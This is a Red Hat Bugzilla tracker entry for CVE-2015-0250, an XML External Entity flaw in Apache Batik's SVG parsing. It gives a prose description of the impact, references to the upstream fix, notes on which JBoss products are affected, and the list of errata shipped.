Bug 1203762 (CVE-2015-0250) - CVE-2015-0250 batik: XML External Entity (XXE) injection in SVG parsing
Summary: CVE-2015-0250 batik: XML External Entity (XXE) injection in SVG parsing
Keywords:
Status: CLOSED ERRATA
Alias: CVE-2015-0250
Product: Security Response
Classification: Other
Component: vulnerability
Version: unspecified
Hardware: All
OS: Linux
medium
medium
Target Milestone: ---
Assignee: Red Hat Product Security
QA Contact:
URL:
Whiteboard:
Depends On: 1255840 1255833 1255834 1255835 1255836 1255837 1255838 1255839 1255841
Blocks: 1203763 1278997 1385169
TreeView+ depends on / blocked
 
Reported: 2015-03-19 15:52 UTC by Martin Prpič
Modified: 2019-09-29 13:30 UTC (History)
51 users (show)

Fixed In Version: Batik 1.8, Batik 1.7.1, Batik 1.6.1
Doc Type: Bug Fix
Doc Text:
It was found that batik was vulnerable to XML External Entity attacks when parsing SVG files. A remote attacker able to send malicious SVG content to the affected server could use this flaw to read files accessible to the user running the application server, and potentially perform other more advanced XXE attacks.
Clone Of:
Environment:
Last Closed: 2019-06-08 02:40:17 UTC


Attachments (Terms of Use)


Links
System ID Priority Status Summary Last Updated
Red Hat Product Errata RHSA-2015:2559 normal SHIPPED_LIVE Critical: Red Hat JBoss BRMS 6.2.0 update 2015-12-08 01:46:42 UTC
Red Hat Product Errata RHSA-2015:2560 normal SHIPPED_LIVE Critical: Red Hat JBoss BPM Suite 6.2.0 update 2015-12-08 01:46:36 UTC
Red Hat Product Errata RHSA-2016:0041 normal SHIPPED_LIVE Moderate: Red Hat JBoss BRMS 6.1.5 update 2016-01-14 23:34:50 UTC
Red Hat Product Errata RHSA-2016:0042 normal SHIPPED_LIVE Moderate: Red Hat JBoss BPM Suite 6.1.5 update 2016-01-14 23:34:44 UTC

Description Martin Prpič 2015-03-19 15:52:24 UTC
The following flaw was found in Apache Batik:

Files lying on the filesystem of the server which uses batik can be revealed to arbitrary users who send maliciously formed SVG files. The file types that can be shown depend on the user context in which the exploitable application is running. If the user is root a full compromise of the server--including confidential or sensitive files--would be possible.

XXE can also be used to attack the availability of the server via denial of service as the references within a xml document can trivially trigger an amplification attack.

Additional information:

http://seclists.org/oss-sec/2015/q1/864

External References:

http://xmlgraphics.apache.org/security.html

Comment 1 Tomas Hoger 2015-08-18 08:38:47 UTC
This issue was also fixed in upstream versions 1.7.1 and 1.6.1.

Upstream commit:

http://svn.apache.org/viewvc?view=revision&revision=1664335

Further details from one of the reporters acknowledged in the upstream advisory:

https://www.insinuator.net/2015/03/xxe-injection-in-apache-batik-library-cve-2015-0250/
https://www.ernw.de/download/apache_batik_xxe_advisory.txt

Comment 5 Jason Shepherd 2015-09-01 03:24:10 UTC
For JBoss Fuse, Apache Batik is used by the camel-fop component to render messages into SVG Image+XML. See:

   https://git-wip-us.apache.org/repos/asf?p=camel.git;a=blob;f=components/camel-fop/src/main/java/org/apache/camel/component/fop/FopProducer.java;h=d41b6d187cb7b5faf48fa3244c0b7d77ed204779;hb=e18459e53cf77514bb0fdfeceb423c456bbc4d9d

The vulnerability fixed an issue with the way SVG parses XML, not with the way it produces it. Therefore the issue doesn't effect JBoss Fuse 6.2.0. Add jboss/fuse=notaffected

Comment 6 Jason Shepherd 2015-09-01 04:02:05 UTC
For JBoss FSW, Apache Batik is used by BPEL Console, see:

   system/layers/soa/org/switchyard/component/bpel/main/module.xml

        <!-- Required by bpel2svg module -->
        <module name="org.apache.xmlgraphics" />

If we check the source code for BPEL (downstream Riftsaw) we see it doesn't use the patched SAXDocumentFactory, it used DOMUtils to write an XML Document:

   https://github.com/riftsaw/riftsaw/blob/master/console/bpel2svg/src/main/java/org/wso2/carbon/bpel/ui/bpel2svg/impl/SVGImpl.java

Similar to JBoss Fuse, the SVG functionality is there for rendering XML, not for parsing it. Updating fsw-6/batik to notaffected.

Comment 9 errata-xmlrpc 2015-12-07 20:47:06 UTC
This issue has been addressed in the following products:

Red Hat JBoss BPM Suite 6.2.0

Via RHSA-2015:2560 https://rhn.redhat.com/errata/RHSA-2015-2560.html

Comment 10 errata-xmlrpc 2015-12-07 20:49:07 UTC
This issue has been addressed in the following products:

Red Hat JBoss BRMS 6.2.0

Via RHSA-2015:2559 https://rhn.redhat.com/errata/RHSA-2015-2559.html

Comment 11 errata-xmlrpc 2016-01-14 18:35:03 UTC
This issue has been addressed in the following products:

Red Hat JBoss BPM Suite 6.1.5

Via RHSA-2016:0042 https://rhn.redhat.com/errata/RHSA-2016-0042.html

Comment 12 errata-xmlrpc 2016-01-14 18:36:15 UTC
This issue has been addressed in the following products:

Red Hat JBoss BRMS 6.1.5

Via RHSA-2016:0041 https://rhn.redhat.com/errata/RHSA-2016-0041.html


Note You need to log in before you can comment on or make changes to this bug.